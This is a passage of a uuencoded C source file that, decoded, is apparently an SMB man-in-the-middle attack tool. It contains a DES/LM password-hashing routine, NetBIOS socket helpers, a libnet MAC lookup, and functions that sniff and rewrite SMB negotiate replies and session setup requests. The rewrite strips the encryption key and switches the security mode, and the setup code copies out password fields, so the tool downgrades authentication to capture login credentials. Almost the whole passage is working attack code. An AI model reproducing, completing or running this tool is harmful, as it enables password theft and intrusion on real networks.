+M("`@("`@("`@("`@("`@("`@("`@("`@(#$V+"`Q-RP@,3@L(#$Y+"`R,"P@
+M,C$L#0H@("`@("`@("`@("`@("`@("`@("`@("`@("`R,"P@,C$L(#(R+"`R
+M,RP@,C0L(#(U+`T*("`@("`@("`@("`@("`@("`@("`@("`@("`@,C0L(#(U
+M+"`R-BP@,C<L(#(X+"`R.2P-"B`@("`@("`@("`@("`@("`@("`@("`@("`@
+M(#(X+"`R.2P@,S`L(#,Q+"`S,BP@(#%].PT*#0IS=&%T:6,@=6-H87(@<&5R
+M;35;,S)=(#T@>R`@("`@(#$V+"`@-RP@,C`L(#(Q+`T*("`@("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@,CDL(#$R+"`R."P@,3<L#0H@("`@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@,2P@,34L(#(S+"`R-BP-"B`@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@("`U+"`Q."P@,S$L(#$P+`T*("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@("`@(#(L("`X+"`R-"P@,30L#0H@("`@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`S,BP@,C<L("`S+"`@.2P-"B`@
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@(#$Y+"`Q,RP@,S`L("`V+`T*
+M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@,C(L(#$Q+"`@-"P@,C5]
+M.PT*#0H-"G-T871I8R!U8VAA<B!P97)M-ELV-%T@/7L@-#`L("`X+"`T."P@
+M,38L(#4V+"`R-"P@-C0L(#,R+`T*("`@("`@("`@("`@("`@("`@("`@("`@
+M,SDL("`W+"`T-RP@,34L(#4U+"`R,RP@-C,L(#,Q+`T*("`@("`@("`@("`@
+M("`@("`@("`@("`@,S@L("`V+"`T-BP@,30L(#4T+"`R,BP@-C(L(#,P+`T*
+M("`@("`@("`@("`@("`@("`@("`@("`@,S<L("`U+"`T-2P@,3,L(#4S+"`R
+M,2P@-C$L(#(Y+`T*("`@("`@("`@("`@("`@("`@("`@("`@,S8L("`T+"`T
+M-"P@,3(L(#4R+"`R,"P@-C`L(#(X+`T*("`@("`@("`@("`@("`@("`@("`@
+M("`@,S4L("`S+"`T,RP@,3$L(#4Q+"`Q.2P@-3DL(#(W+`T*("`@("`@("`@
+M("`@("`@("`@("`@("`@,S0L("`R+"`T,BP@,3`L(#4P+"`Q."P@-3@L(#(V
+M+`T*("`@("`@("`@("`@("`@("`@("`@("`@,S,L("`Q+"`T,2P@(#DL(#0Y
+M+"`Q-RP@-3<L(#(U?3L-"@T*#0IS=&%T:6,@=6-H87(@<V-;,39=(#T@>S$L
+M(#$L(#(L(#(L(#(L(#(L(#(L(#(L(#$L(#(L(#(L(#(L(#(L(#(L(#(L(#%]
+M.PT*#0IS=&%T:6,@=6-H87(@<V)O>%LX75LT75LQ-ET@/2![#0I[>S$T+"`@
+M-"P@,3,L("`Q+"`@,BP@,34L(#$Q+"`@."P@(#,L(#$P+"`@-BP@,3(L("`U
+M+"`@.2P@(#`L("`W?2P-"B![,"P@,34L("`W+"`@-"P@,30L("`R+"`Q,RP@
+M(#$L(#$P+"`@-BP@,3(L(#$Q+"`@.2P@(#4L("`S+"`@.'TL#0H@>S0L("`Q
+M+"`Q-"P@(#@L(#$S+"`@-BP@(#(L(#$Q+"`Q-2P@,3(L("`Y+"`@-RP@(#,L
+M(#$P+"`@-2P@(#!]+`T*('LQ-2P@,3(L("`X+"`@,BP@(#0L("`Y+"`@,2P@
+M(#<L("`U+"`Q,2P@(#,L(#$T+"`Q,"P@(#`L("`V+"`Q,WU]+`T*#0I[>S$U
+M+"`@,2P@(#@L(#$T+"`@-BP@,3$L("`S+"`@-"P@(#DL("`W+"`@,BP@,3,L
+M(#$R+"`@,"P@(#4L(#$P?2P-"B![,RP@,3,L("`T+"`@-RP@,34L("`R+"`@
+M."P@,30L(#$R+"`@,"P@(#$L(#$P+"`@-BP@(#DL(#$Q+"`@-7TL#0H@>S`L
+M(#$T+"`@-RP@,3$L(#$P+"`@-"P@,3,L("`Q+"`@-2P@(#@L(#$R+"`@-BP@
+M(#DL("`S+"`@,BP@,35]+`T*('LQ,RP@(#@L(#$P+"`@,2P@(#,L(#$U+"`@
+M-"P@(#(L(#$Q+"`@-BP@(#<L(#$R+"`@,"P@(#4L(#$T+"`@.7U]+`T*#0I[
+M>S$P+"`@,"P@(#DL(#$T+"`@-BP@(#,L(#$U+"`@-2P@(#$L(#$S+"`Q,BP@
+M(#<L(#$Q+"`@-"P@(#(L("`X?2P-"B![,3,L("`W+"`@,"P@(#DL("`S+"`@
+M-"P@(#8L(#$P+"`@,BP@(#@L("`U+"`Q-"P@,3(L(#$Q+"`Q-2P@(#%]+`T*
+M('LQ,RP@(#8L("`T+"`@.2P@(#@L(#$U+"`@,RP@(#`L(#$Q+"`@,2P@(#(L
+M(#$R+"`@-2P@,3`L(#$T+"`@-WTL#0H@>S$L(#$P+"`Q,RP@(#`L("`V+"`@
+M.2P@(#@L("`W+"`@-"P@,34L(#$T+"`@,RP@,3$L("`U+"`@,BP@,3)]?2P-
+M"@T*>WLW+"`Q,RP@,30L("`S+"`@,"P@(#8L("`Y+"`Q,"P@(#$L("`R+"`@
+M."P@(#4L(#$Q+"`Q,BP@(#0L(#$U?2P-"B![,3,L("`X+"`Q,2P@(#4L("`V
+M+"`Q-2P@(#`L("`S+"`@-"P@(#<L("`R+"`Q,BP@(#$L(#$P+"`Q-"P@(#E]
+M+`T*('LQ,"P@(#8L("`Y+"`@,"P@,3(L(#$Q+"`@-RP@,3,L(#$U+"`@,2P@
+M(#,L(#$T+"`@-2P@(#(L("`X+"`@-'TL#0H@>S,L(#$U+"`@,"P@(#8L(#$P
+M+"`@,2P@,3,L("`X+"`@.2P@(#0L("`U+"`Q,2P@,3(L("`W+"`@,BP@,31]
+M?2P-"@T*>WLR+"`Q,BP@(#0L("`Q+"`@-RP@,3`L(#$Q+"`@-BP@(#@L("`U
+M+"`@,RP@,34L(#$S+"`@,"P@,30L("`Y?2P-"B![,30L(#$Q+"`@,BP@,3(L
+M("`T+"`@-RP@,3,L("`Q+"`@-2P@(#`L(#$U+"`Q,"P@(#,L("`Y+"`@."P@
+M(#9]+`T*('LT+"`@,BP@(#$L(#$Q+"`Q,"P@,3,L("`W+"`@."P@,34L("`Y
+M+"`Q,BP@(#4L("`V+"`@,RP@(#`L(#$T?2P-"B![,3$L("`X+"`Q,BP@(#<L
+M("`Q+"`Q-"P@(#(L(#$S+"`@-BP@,34L("`P+"`@.2P@,3`L("`T+"`@-2P@
+M(#-]?2P-"@T*>WLQ,BP@(#$L(#$P+"`Q-2P@(#DL("`R+"`@-BP@(#@L("`P
+M+"`Q,RP@(#,L("`T+"`Q-"P@(#<L("`U+"`Q,7TL#0H@>S$P+"`Q-2P@(#0L
+M("`R+"`@-RP@,3(L("`Y+"`@-2P@(#8L("`Q+"`Q,RP@,30L("`P+"`Q,2P@
+M(#,L("`X?2P-"B![.2P@,30L(#$U+"`@-2P@(#(L("`X+"`Q,BP@(#,L("`W
+M+"`@,"P@(#0L(#$P+"`@,2P@,3,L(#$Q+"`@-GTL#0H@>S0L("`S+"`@,BP@
+M,3(L("`Y+"`@-2P@,34L(#$P+"`Q,2P@,30L("`Q+"`@-RP@(#8L("`P+"`@
+M."P@,3-]?2P-"@T*>WLT+"`Q,2P@(#(L(#$T+"`Q-2P@(#`L("`X+"`Q,RP@
+M(#,L(#$R+"`@.2P@(#<L("`U+"`Q,"P@(#8L("`Q?2P-"B![,3,L("`P+"`Q
+M,2P@(#<L("`T+"`@.2P@(#$L(#$P+"`Q-"P@(#,L("`U+"`Q,BP@(#(L(#$U
+M+"`@."P@(#9]+`T*('LQ+"`@-"P@,3$L(#$S+"`Q,BP@(#,L("`W+"`Q-"P@
+M,3`L(#$U+"`@-BP@(#@L("`P+"`@-2P@(#DL("`R?2P-"B![-BP@,3$L(#$S
+M+"`@."P@(#$L("`T+"`Q,"P@(#<L("`Y+"`@-2P@(#`L(#$U+"`Q-"P@(#(L
+M("`S+"`Q,GU]+`T*#0I[>S$S+"`@,BP@(#@L("`T+"`@-BP@,34L(#$Q+"`@
+M,2P@,3`L("`Y+"`@,RP@,30L("`U+"`@,"P@,3(L("`W?2P-"B![,2P@,34L
+M(#$S+"`@."P@,3`L("`S+"`@-RP@(#0L(#$R+"`@-2P@(#8L(#$Q+"`@,"P@
+M,30L("`Y+"`@,GTL#0H@>S<L(#$Q+"`@-"P@(#$L("`Y+"`Q,BP@,30L("`R
+M+"`@,"P@(#8L(#$P+"`Q,RP@,34L("`S+"`@-2P@(#A]+`T*('LR+"`@,2P@
+M,30L("`W+"`@-"P@,3`L("`X+"`Q,RP@,34L(#$R+"`@.2P@(#`L("`S+"`@
+M-2P@(#8L(#$Q?7U].PT*#0IS=&%T:6,@=F]I9"!P97)M=71E*&-H87(@*F]U
+M="P@8VAA<B`J:6XL('5C:&%R("IP+"!I;G0@;BD-"GL-"@EI;G0@:3L-"@EF
+M;W(@*&D],#MI/&X[:2LK*0T*"0EO=71;:5T@/2!I;EMP6VE=+3%=.PT*?0T*
+M#0IS=&%T:6,@=F]I9"!L<VAI9G0H8VAA<B`J9"P@:6YT(&-O=6YT+"!I;G0@
+M;BD-"GL-"@EC:&%R(&]U=%LV-%T[#0H):6YT(&D[#0H)9F]R("AI/3`[:3QN
+M.VDK*RD-"@D);W5T6VE=(#T@9%LH:2MC;W5N="DE;ET[#0H)9F]R("AI/3`[
+M:3QN.VDK*RD-"@D)9%MI72`](&]U=%MI73L-"GT-"@T*<W1A=&EC('9O:60@
+M8V]N8V%T*&-H87(@*F]U="P@8VAA<B`J:6XQ+"!C:&%R("II;C(L(&EN="!L
+M,2P@:6YT(&PR*0T*>PT*"7=H:6QE("AL,2TM*0T*"0DJ;W5T*RL@/2`J:6XQ
+M*RL[#0H)=VAI;&4@*&PR+2TI#0H)"2IO=70K*R`]("II;C(K*SL-"GT-"@T*
+M<W1A=&EC('9O:60@>&]R*&-H87(@*F]U="P@8VAA<B`J:6XQ+"!C:&%R("II
+M;C(L(&EN="!N*0T*>PT*"6EN="!I.PT*"69O<B`H:3TP.VD\;CMI*RLI#0H)
+M"6]U=%MI72`](&EN,5MI72!>(&EN,EMI73L-"GT-"@T*<W1A=&EC('9O:60@
+M9&]H87-H*&-H87(@*F]U="P@8VAA<B`J:6XL(&-H87(@*FME>2P@:6YT(&9O
+M<G<I#0I[#0H):6YT(&DL(&HL(&L[#0H)8VAA<B!P:S%;-39=.PT*"6-H87(@
+M8ULR.%T[#0H)8VAA<B!D6S(X73L-"@EC:&%R(&-D6S4V73L-"@EC:&%R(&MI
+M6S$V75LT.%T[#0H)8VAA<B!P9#%;-C1=.PT*"6-H87(@;%LS,ETL(');,S)=
+M.PT*"6-H87(@<FQ;-C1=.PT*#0H)<&5R;75T92AP:S$L(&ME>2P@<&5R;3$L
+M(#4V*3L-"@T*"69O<B`H:3TP.VD\,C@[:2LK*0T*"0EC6VE=(#T@<&LQ6VE=
+M.PT*"69O<B`H:3TP.VD\,C@[:2LK*0T*"0ED6VE=(#T@<&LQ6VDK,CA=.PT*
+M#0H)9F]R("AI/3`[:3PQ-CMI*RLI('L-"@D);'-H:69T*&,L('-C6VE=+"`R
+M."D[#0H)"6QS:&EF="AD+"!S8UMI72P@,C@I.PT*#0H)"6-O;F-A="AC9"P@
+M8RP@9"P@,C@L(#(X*3L@#0H)"7!E<FUU=&4H:VE;:5TL(&-D+"!P97)M,BP@
+M-#@I.R`-"@E]#0H-"@EP97)M=71E*'!D,2P@:6XL('!E<FTS+"`V-"D[#0H-
+M"@EF;W(@*&H],#MJ/#,R.VHK*RD@>PT*"0EL6VI=(#T@<&0Q6VI=.PT*"0ER
+M6VI=(#T@<&0Q6VHK,S)=.PT*"7T-"@T*"69O<B`H:3TP.VD\,38[:2LK*2![
+M#0H)"6-H87(@97);-#A=.PT*"0EC:&%R(&5R:ULT.%T[#0H)"6-H87(@8ELX
+M75LV73L-"@D)8VAA<B!C8ELS,ET[#0H)"6-H87(@<&-B6S,R73L-"@D)8VAA
+M<B!R,ELS,ET[#0H-"@D)<&5R;75T92AE<BP@<BP@<&5R;30L(#0X*3L-"@T*
+M"0EX;W(H97)K+"!E<BP@:VE;9F]R=R`_(&D@.B`Q-2`M(&E=+"`T."D[#0H-
+M"@D)9F]R("AJ/3`[:CPX.VHK*RD-"@D)"69O<B`H:STP.VL\-CMK*RLI#0H)
+M"0D)8EMJ75MK72`](&5R:UMJ*C8@*R!K73L-"@T*"0EF;W(@*&H],#MJ/#@[
+M:BLK*2![#0H)"0EI;G0@;2P@;CL-"@D)"6T@/2`H8EMJ75LP73P\,2D@?"!B
+M6VI=6S5=.PT*#0H)"0EN(#T@*&);:EU;,5T\/#,I('P@*&);:EU;,ET\/#(I
+M('P@#0H)"0D)*&);:EU;,UT\/#$I('P@8EMJ75LT73L@#0H-"@D)"69O<B`H
+M:STP.VL\-#MK*RLI(`T*"0D)"6);:EU;:UT@/2`H<V)O>%MJ75MM75MN72`F
+M(`T*"0D)"0D)*#$\/"@S+6LI*2D_,3HP.R`-"@D)?0T*#0H)"69O<B`H:CTP
+M.VH\.#MJ*RLI#0H)"0EF;W(@*&L],#MK/#0[:RLK*0T*"0D)"6-B6VHJ-"MK
+M72`](&);:EU;:UT[#0H)"7!E<FUU=&4H<&-B+"!C8BP@<&5R;34L(#,R*3L-
+M"@T*"0EX;W(H<C(L(&PL('!C8BP@,S(I.PT*#0H)"69O<B`H:CTP.VH\,S([
+M:BLK*0T*"0D);%MJ72`](');:ET[#0H-"@D)9F]R("AJ/3`[:CPS,CMJ*RLI
+M#0H)"0ER6VI=(#T@<C);:ET[#0H)?0T*#0H)8V]N8V%T*')L+"!R+"!L+"`S
+M,BP@,S(I.PT*#0H)<&5R;75T92AO=70L(')L+"!P97)M-BP@-C0I.PT*?0T*
+M#0IS=&%T:6,@=F]I9"!S=')?=&]?:V5Y*&-O;G-T('5N<VEG;F5D(&-H87(@
+M*G-T<BQU;G-I9VYE9"!C:&%R("IK97DI#0I[#0H):6YT(&D[#0H-"@EK97E;
+M,%T@/2!S=');,%T^/C$[#0H):V5Y6S%=(#T@*"AS=');,%TF,'@P,2D\/#8I
+M('P@*'-T<ELQ73X^,BD[#0H):V5Y6S)=(#T@*"AS=');,5TF,'@P,RD\/#4I
+M('P@*'-T<ELR73X^,RD[#0H):V5Y6S-=(#T@*"AS=');,ETF,'@P-RD\/#0I
+M('P@*'-T<ELS73X^-"D[#0H):V5Y6S1=(#T@*"AS=');,UTF,'@P1BD\/#,I
+M('P@*'-T<ELT73X^-2D[#0H):V5Y6S5=(#T@*"AS=');-%TF,'@Q1BD\/#(I
+M('P@*'-T<ELU73X^-BD[#0H):V5Y6S9=(#T@*"AS=');-5TF,'@S1BD\/#$I
+M('P@*'-T<ELV73X^-RD[#0H):V5Y6S==(#T@<W1R6S9=)C!X-T8[#0H)9F]R
+M("AI/3`[:3PX.VDK*RD@>PT*"0EK97E;:5T@/2`H:V5Y6VE=/#PQ*3L-"@E]
+M#0I]#0H-"@T*<W1A=&EC('9O:60@<VUB:&%S:"AU;G-I9VYE9"!C:&%R("IO
+M=70L#0H)"6-O;G-T('5N<VEG;F5D(&-H87(@*FEN+`T*"0EC;VYS="!U;G-I
+M9VYE9"!C:&%R("IK97DL#0H)"6EN="!F;W)W*0T*>PT*"6EN="!I.PT*"6-H
+M87(@;W5T8ELV-%T[#0H)8VAA<B!I;F);-C1=.PT*"6-H87(@:V5Y8ELV-%T[
+M#0H)=6YS:6=N960@8VAA<B!K97DR6SA=.PT*#0H)<W1R7W1O7VME>2AK97DL
+M(&ME>3(I.PT*#0H)9F]R("AI/3`[:3PV-#MI*RLI('L-"@D):6YB6VE=(#T@
+M*&EN6VDO.%T@)B`H,3P\*#<M*&DE."DI*2D@/R`Q(#H@,#L-"@D):V5Y8EMI
+M72`]("AK97DR6VDO.%T@)B`H,3P\*#<M*&DE."DI*2D@/R`Q(#H@,#L-"@D)
+M;W5T8EMI72`](#`[#0H)?0T*#0H)9&]H87-H*&]U=&(L(&EN8BP@:V5Y8BP@
+M9F]R=RD[#0H-"@EF;W(@*&D],#MI/#@[:2LK*2![#0H)"6]U=%MI72`](#`[
+M#0H)?0T*#0H)9F]R("AI/3`[:3PV-#MI*RLI('L-"@D):68@*&]U=&);:5TI
+M#0H)"0EO=71;:2\X72!\/2`H,3P\*#<M*&DE."DI*3L-"@E]#0I]#0H-"G9O
+M:60@15]0,38H8V]N<W0@=6YS:6=N960@8VAA<B`J<#$T+'5N<VEG;F5D(&-H
+M87(@*G`Q-BD-"GL-"G5N<VEG;F5D(&-H87(@<W`X6SA=(#T@>S!X-&(L(#!X
+M-#<L(#!X-3,L(#!X,C$L(#!X-#`L(#!X,C,L(#!X,C0L(#!X,C5].PT*"7-M
+M8FAA<V@H<#$V+"!S<#@L('`Q-"P@,2D[#0H)<VUB:&%S:"AP,38K."P@<W`X
+M+"!P,30K-RP@,2D[#0I]#0H-"G9O:60@15]0,C0H8V]N<W0@=6YS:6=N960@
+M8VAA<B`J<#(Q+"`-"@D)8V]N<W0@=6YS:6=N960@8VAA<B`J8S@L('5N<VEG
+M;F5D(&-H87(@*G`R-"D-"GL-"@ES;6)H87-H*'`R-"P@8S@L('`R,2P@,2D[
+M#0H)<VUB:&%S:"AP,C0K."P@8S@L('`R,2LW+"`Q*3L-"@ES;6)H87-H*'`R
+M-"LQ-BP@8S@L('`R,2LQ-"P@,2D[#0I]#0H-"B\J*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*B\-"B\O36]D:69I960@9G5N8W1I;VYS('1O(')E860@86YD('=R
+M:71E(`T*#0IV;VED(%)E860H#0H@("`@("`@("`@:6YT(%-O8VLL#0H@("`@
+M("`@("`@=5]C:&%R("I086-K970I#0I[#0H@3F)T4V5S<VEO;DAD<B!.8G13
+M97-S:6]N.PT*#0H@;65M<V5T*%!A8VME="PP+$E07TU!6%]325I%*3L-"@D-
+M"B!R96%D*%-O8VLL)DYB=%-E<W-I;VXL<VEZ96]F*$YB=%-E<W-I;VY(9'(I
+M*3L-"B`@#0H@;65M8W!Y*%!A8VME="PH=5]C:&%R("HI("@F3F)T4V5S<VEO
+M;BDL<VEZ96]F*$YB=%-E<W-I;VY(9'(I*3L-"@T*(')E860H4V]C:RP-"B`@
+M("`@("`H=5]C:&%R("HI("A086-K970@*R!S:7IE;V8H3F)T4V5S<VEO;DAD
+M<BDI+`T*("`@("`@(&YT;VAS*$YB=%-E<W-I;VXN3&5N9W1H*2D[#0I]#0H@
+M#0H-"B`-"G9O:60@5W)I=&4H#0H@("`@("`@("`@(&EN="!3;V-K+`T*("`@
+M("`@("`@("!U7V-H87(@*E!A8VME="D-"GL-"B!.8G1397-S:6]N2&1R("I.
+M8G1397-S:6]N.PT*(`T*($YB=%-E<W-I;VX@/2`H3F)T4V5S<VEO;DAD<B`J
+M*2`H4&%C:V5T*3L-"B`-"B!W<FET92A3;V-K+`T*("`@("`@(%!A8VME="P-
+M"B`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<BD@*R`-"B`@("`@("!N=&]H
+M<RA.8G1397-S:6]N+3Y,96YG=&@I*3L-"GT-"@T*+RHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ+PT*#0HO*E1O(&AA=F4@=&AE($U!0R!A9&1R97-S(&]F('1H
+M92!M86-H:6YE*B\-"@T*=F]I9"!'971%;F5T061D<F5S<RAU7V-H87(@*D5N
+M970L8VAA<B`J1&5V:6-E*0T*>PT*(&QI8FYE=%]T("IL.PT*('-T<G5C="!L
+M:6)N971?971H97)?861D<B`J93L-"B!C:&%R($5R<D)U9EM,24).151?15)2
+M0E5&7U-)6D5=.PT*#0H@;"`](&QI8FYE=%]I;FET*$Q)0DY%5%],24Y++$1E
+M=FEC92Q%<G)"=68I.PT*#0H@92`](&QI8FYE=%]G971?:'=A9&1R*&PI.PT*
+M#0H@;65M8W!Y*$5N970L92T^971H97)?861D<E]O8W1E="Q%5$A?04Q%3BD[
+M#0H-"GT-"@T*+RHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#0HO*E1O(&UO
+M9&EF>2!T:&4@;F5G<')O="!R97!L>2HO#0H-"G9O:60@3F5G4')O=%)E<&QY
+M*'5?8VAA<B`J4&%C:V5T+`T*("`@("`@("`@("`@("`@("`@=5]C:&%R("I%
+M;F-R>7!T:6]N2V5Y+`T*("`@("`@("`@("`@("`@("`@:6YT("I396-U<FET
+M>2D-"GL-"B!.8G1397-S:6]N2&1R("I.8G1397-S:6]N.PT*(`T*(%-M8D)A
+M<V5(9'(@*E-M8D)A<V4[#0H-"B!3;6).96=0<F]T4F5P;'E(9'(@*E-M8DYE
+M9U!R;W1297!L>3L-"@T*+RI&;W(@=&AE(&1O;6%I;B!N86UE*B\-"@T*('5?
+M8VAA<B`J1&]M86EN3F%M93L-"@T*(&EN="!$;VUA:6Y.86UE3&5N9W1H.PT*
+M#0HO*E-T87)T<R!H97)E("$J+R`-"B`-"B!.8G1397-S:6]N(#T@*$YB=%-E
+M<W-I;VY(9'(@*BD@*%!A8VME="D[#0H-"B!3;6)"87-E(#T@*%-M8D)A<V5(
+M9'(@*BD@*%!A8VME="`K('-I>F5O9BA.8G1397-S:6]N2&1R*2D[#0H-"B!3
+M;6).96=0<F]T4F5P;'D@/2`H4VUB3F5G4')O=%)E<&QY2&1R("HI(`T*("`@
+M("`@("`@("`@("`@("`@("A086-K970@*PT*("`@("`@("`@("`@("`@("`@
+M("!S:7IE;V8H3F)T4V5S<VEO;DAD<BD@*PT*("`@("`@("`@("`@("`@("`@
+M("!S:7IE;V8H4VUB0F%S94AD<BDI.R`-"B`@("`@("`@("`@("`@("`@("`@
+M(`T*("\J5&\@:&%V92!T:&4@9&]M86EN($YA;64J+PT*#0H@*E-E8W5R:71Y
+M(#T@*%-M8DYE9U!R;W1297!L>2T^4V5C=7)I='E-;V1E*2`F(#$[#0H-"B!I
+M9BA396-U<FET>2D-"B![#0H@('!R:6YT9B@B7&Y5<V5R(&QE=F5L(%-E8W5R
+M:71Y7&XB*3L-"B!]#0H@96QS90T*('L-"B`@<')I;G1F*")<;E-H87)E(&QE
+M=F5L(%-E8W5R:71Y7&XB*3L-"B!]#0H-"B!$;VUA:6Y.86UE3&5N9W1H(#T@
+M("`-"B`@("`@("`@("`@("`@("`@("`@4VUB3F5G4')O=%)E<&QY+3Y">71E
+M0V]U;G1;,%TM#0H@("`@("`@("`@("`@("`@("`@($5.0U]+15E?3$5.1U1(
+M.PT*#0H@1&]M86EN3F%M92`]("AU7V-H87(@*BD@#0H@("`@("`@("`@("`@
+M("AM86QL;V,H1&]M86EN3F%M94QE;F=T:"`J('-I>F5O9BAU7V-H87(I*2D[
+M#0H-"B`O*D-O<'D@=&AE($1O;6%I;B!N86UE(&EN(&$@<W1R:6YG*B\-"@T*
+M(&UE;6-P>2A$;VUA:6Y.86UE+`T*("`@("`@("`H=5]C:&%R("HI(`T*("`@
+M("`@("`H4&%C:V5T("L-"B`@("`@("`@('-I>F5O9BA.8G1397-S:6]N2&1R
+M*2`K#0H@("`@("`@("!S:7IE;V8H4VUB0F%S94AD<BD@*PT*("`@("`@("`@
+M<VEZ96]F*%-M8DYE9U!R;W1297!L>4AD<BD@*PT*("`@("`@("`@14Y#7TM%
+M65],14Y'5$@I+`T*("`@("`@("!$;VUA:6Y.86UE3&5N9W1H*3L-"B`@("`@
+M("`@(`T*("\J5&\@:&%V92!T:&4@96YC<GEP=&EO;B!K97DJ+PT*#0H@;65M
+M8W!Y*$5N8W)Y<'1I;VY+97DL#0H@("`@("`@("AU7V-H87(@*BD@*%!A8VME
+M="`K#0H@("`@("`@("`@("`@("`@("`@('-I>F5O9BA.8G1397-S:6]N2&1R
+M*2`K#0H@("`@("`@("`@("`@("`@("`@('-I>F5O9BA3;6)"87-E2&1R*2`K
+M#0H@("`@("`@("`@("`@("`@("`@('-I>F5O9BA3;6).96=0<F]T4F5P;'E(
+M9'(I*2P-"B`@("`@("`@($5.0U]+15E?3$5.1U1(*3L-"B`@("`@("`-"B`O
+M*E!A8VME="!M;V1I9FEC871I;VXJ+PT*#0H@+RI0=70@=&AE(&1O;6%I;B!N
+M86UE('-T<FEN9R!I;G-T96%D(&]F('1H92!E;F-R>7!T:6]N(&ME>2HO#0H-
+M"B!M96UC<'DH*'5?8VAA<B`J("D@*%!A8VME="`K#0H@("`@("`@("`@("`@
+M("`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<BD@*PT*("`@("`@("`@("`@
+M("`@("`@("`@<VEZ96]F*%-M8D)A<V5(9'(I("L-"B`@("`@("`@("`@("`@
+M("`@("`@('-I>F5O9BA3;6).96=0<F]T4F5P;'E(9'(I*2P-"B`@("`@("`@
+M("`@("`@("`@("`@($1O;6%I;DYA;64L#0H@("`@("`@("`@("`@("`@("`@
+M("!$;VUA:6Y.86UE3&5N9W1H*3L-"@T*(%-M8DYE9U!R;W1297!L>2T^0GET
+M94-O=6YT6S!=(#T@1&]M86EN3F%M94QE;F=T:#L-"@T*+RI4;R!M;V1I9GD@
+M=&AE('-E8W5R:71Y(&UO9&4@8GET92!A;F0@=&AE(&5N8W)Y<'1I;VX@:V5Y
+M(&QE;F=T:"HO#0H@#0H@4VUB3F5G4')O=%)E<&QY+3Y396-U<FET>4UO9&4@
+M/2`P>#`Q.PT*(%-M8DYE9U!R;W1297!L>2T^16YC<GEP=&EO;DME>4QE;F=T
+M:"`](#!X,#`[#0H-"B!.8G1397-S:6]N+3Y,96YG=&@@/2!H=&]N<RAS:7IE
+M;V8H4VUB0F%S94AD<BD@*PT*("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M('-I>F5O9BA3;6).96=0<F]T4F5P;'E(9'(I("L-"B`@("`@("`@("`@("`@
+M("`@("`@("`@("`@("!$;VUA:6Y.86UE3&5N9W1H*3L-"@T*?0T*(`T*#0H@
+M("`@#0H@#0HO*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHO#0H-"B\J*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"@T*+RI3;FEF9BP@;6]D:69Y(&%N9"!S96YD
+M('1H92!S971U<"!8(')E<75E<W0J+PT*#0H-"G9O:60@4V5T=7!84F5Q=65S
+M="@-"B`@("`@("`@("`@("`@("`@("`@=5]C:&%R("I086-K970L#0H@("`@
+M("`@("`@("`@("`@("`@('5?8VAA<B`J16YC<GEP=&EO;DME>2P-"B`@("`@
+M("`@("`@("`@("`@("`@:6YT(%-E8W5R:71Y*0T*>PT*($YB=%-E<W-I;VY(
+M9'(@*DYB=%-E<W-I;VX[#0H-"B!3;6)"87-E2&1R("I3;6)"87-E.PT*#0H@
+M4VUB4V5T=7!84F5Q=65S=$AD<B`J4VUB4V5T=7!84F5Q=65S=#L-"@T*+RI&
+M;W(@<&%C:V5T(&UO9&EF:6-A=&EO;BHO#0H@=5]C:&%R("I496UP.PT*('5?
+M8VAA<B!%;F-R>7!T961087-S=V]R9%M%3D-?4$%34U=/4D1?3$5.1U1(73L-
+M"B!I;G0@5&5M<%-I>F4[#0H@=5]C:&%R(%!A<W-W;W)D6S$V73L-"@T*+RI3
+M=&%R=',@:&5R92HO#0H-"B!.8G1397-S:6]N(#T@*$YB=%-E<W-I;VY(9'(@
+M*BD@*%!A8VME="D[("`-"@T*(%-M8D)A<V4@/2`H4VUB0F%S94AD<B`J*2`H
+M4&%C:V5T("L-"B`@("`@("`@("`@("`@("`@("`@("`@("`@('-I>F5O9BA.
+M8G1397-S:6]N2&1R*2D[#0H)"0T*(%-M8E-E='5P6%)E<75E<W0@/2`H4VUB
+M4V5T=7!84F5Q=65S=$AD<B`J*2`-"B`@("`@("`@("`@("`@("`@("`@*%!A
+M8VME="`K(`T*("`@("`@("`@("`@("`@("`@("`@<VEZ96]F*$YB=%-E<W-I
+M;VY(9'(I("L-"B`@("`@("`@("`@("`@("`@("`@('-I>F5O9BA3;6)"87-E
+M2&1R*2D[#0H-"B!M96US970H4&%S<W=O<F0L,"PQ-BD[#0H@("`@("`@#0H@
+M<W1R;F-P>2A087-S=V]R9"P-"B`@("`@("`@("AU7V-H87(@*BD@#0H@("`@
+M("`@("`H4&%C:V5T("L-"B`@("`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD
+M<BD@*PT*("`@("`@("`@('-I>F5O9BA3;6)"87-E2&1R*2`K(`T*("`@("`@
+M("`@('-I>F5O9BA3;6)3971U<%A297%U97-T2&1R*2DL#0H@("`@("`@("`@
+M4VUB4V5T=7!84F5Q=65S="T^0V%S94EN<V5N<VET:79E4&%S<W=O<F1,96YG
+M=&A;,%TI.PT*("`@("`@(`T*("\J268@=&AE<F4@:7,@82!S:&%R92!S96-U
